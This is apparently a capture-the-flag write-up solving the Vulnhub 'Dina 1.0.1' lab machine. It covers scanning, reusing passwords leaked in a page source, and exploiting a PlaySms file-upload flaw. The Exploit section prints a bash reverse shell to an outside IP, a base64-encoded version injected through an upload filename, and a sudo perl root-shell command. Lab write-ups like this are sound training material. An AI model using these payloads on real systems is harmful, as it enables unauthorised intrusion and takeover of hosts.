Dina 1.0.1 - Vulnhub VM Challenge


tl;dr

  • Remote Code Execution
  • Unrestricted File Upload

Solved by: 47Suriya

The IP of the target machine is found by using Netdiscover tool.

Netdiscover

IP of the Machine is 192.168.1.165

Initial Analysis

First, Nmap scanner is used to find all the open ports and services running.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿kali)-[~]
└─$ nmap -sV -p- -T4 -A 192.168.1.165
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-05 01:47 EDT
Nmap scan report for 192.168.1.165
Host is up (0.0026s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
|_/ange1 /angel1 /nothing /tmp /uploads
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Dina

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.55 seconds

This scan reveals that there is only 1 open port which is port 80. Also an Apache server is hosted and this scan also reveals that there is a robots.txt file which disallows 5 directories.

When navigated to the page hosted by the Apache server:

page

This page revealed no important information. As there was a robots.txt file present, let’s try checking the disallowed directories.

While checking the nothing directory, the page contained no useful information.

nothing

When the page source was checked:

Passwords

A bunch of passwords was revealed. These might be useful.

It’s time to do some more recon.

Nikto Web scanner is used here to scan for any possible vulnerabilities and information.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~]
└─$ nikto -h 192.168.1.165
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.165
+ Target Hostname: 192.168.1.165
+ Target Port: 80
+ Start Time: 2021-08-05 01:50:30 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 09:46:52 2017
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /ange1/: Directory indexing found.
+ Entry '/ange1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /angel1/: Directory indexing found.
+ Entry '/angel1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /uploads/: Directory indexing found.
+ Entry '/uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 5 entries which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8730 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time: 2021-08-05 01:50:54 (GMT-4) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

This scan revealed that there was a directory secure which was not mentioned in the robots.txt file.

Now Dirb web content scanner is used to find some information about some hidden directories.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(kali㉿kali)-[~]
└─$ dirb http://192.168.1.165/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Aug 5 01:52:25 2021
URL_BASE: http://192.168.1.165/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.165/ ----
+ http://192.168.1.165/cgi-bin/ (CODE:403|SIZE:289)
+ http://192.168.1.165/index (CODE:200|SIZE:3618)
+ http://192.168.1.165/index.html (CODE:200|SIZE:3618)
+ http://192.168.1.165/robots (CODE:200|SIZE:102)
+ http://192.168.1.165/robots.txt (CODE:200|SIZE:102)
==> DIRECTORY: http://192.168.1.165/secure/
+ http://192.168.1.165/server-status (CODE:403|SIZE:294)
==> DIRECTORY: http://192.168.1.165/tmp/
==> DIRECTORY: http://192.168.1.165/uploads/

---- Entering directory: http://192.168.1.165/secure/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.165/tmp/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.165/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Thu Aug 5 01:52:29 2021
DOWNLOADED: 4612 - FOUND: 6

This scan also revealed that there is a directory secure which was already found by the nikto scan.

This directory might contain something useful. Time to check it out:

secure

This directory contained a file backup.zip. When checking that out, it asked for a password.

backupzip

When trying out the passwords which was found in the nothing directory, the password “freedom” worked.
After extracting, a mp3 file was found. This might be a file that can contain some useful information. So it worked when trying to cat that file:

mp3

And that file contained a username and a hidden password. And also there was a URL mentioned. When checking that out:

login

That URL led to a web application named PlaySms. And it asked for login credentials. As there was a username “touhid” mentioned in the backup-cred.mp3 file, it might be worth trying that.
But in order to find the password, the only source was from the bunch of passwords in the nothing directory. When trying that one by one, the password “diana” worked here.

Playsms

And now there was access to the web application.

Exploit

While searching about this PlaySms Web Application, there was a potential exploit which took advantage of Remote Code Execution and Unrestricted File Upload vulnerability.

Looking at the description:

description

This tells that when a php file with a filename is uploaded using sendfromfile option in the application, the filename gets executed. In order to check whether this exploits works, the filename which was given in the description is used.
i.e. .php

sendfromfile

And when uploaded:

test

Perfect! The script is getting executed.
Now time to exploit this by uploading a reverse shell payload in the place of ‘uname -a’ in the filename.

The payload which is going to be used here is:

1
bash -i >& /dev/tcp/192.168.1.222/1234 0>&1 

But in order to execute this, we have to upload it in the place of the filename. But a filename can’t contain slashes. So in order to bypass it, the payload should be encoded into base64 and uploaded. After that it should get decoded and executed.

The encoded payload: YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMjIyLzEyMzQgMD4mMQo=

And instead of that uname -a inside the single quotes, the payload below is placed to spawn a reverse tcp shell.

1
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMjIyLzEyMzQgMD4mMQo= | base64 -d | bash

So the name of the file will be:

file

Before uploading the file, a netcat listener is started on port 1234 as mentioned in the payload. And then the file is uploaded which will spawn a reverse shell.

rev

Privilege Escalation

Then the sudo permissions is checked using the command ‘sudo -l’

sudo

This shows that the perl commands can be run as root. So when it is used to create a shell with sudo command, a root shell will be spawned.

So for spawning a bash shell with perl the command below is used:

1
sudo /usr/bin/perl -e 'exec "/bin/bash";'

root

Finally, root shell is spawned. And the flag is found which is present in the /root directory.

The challenge is now complete!!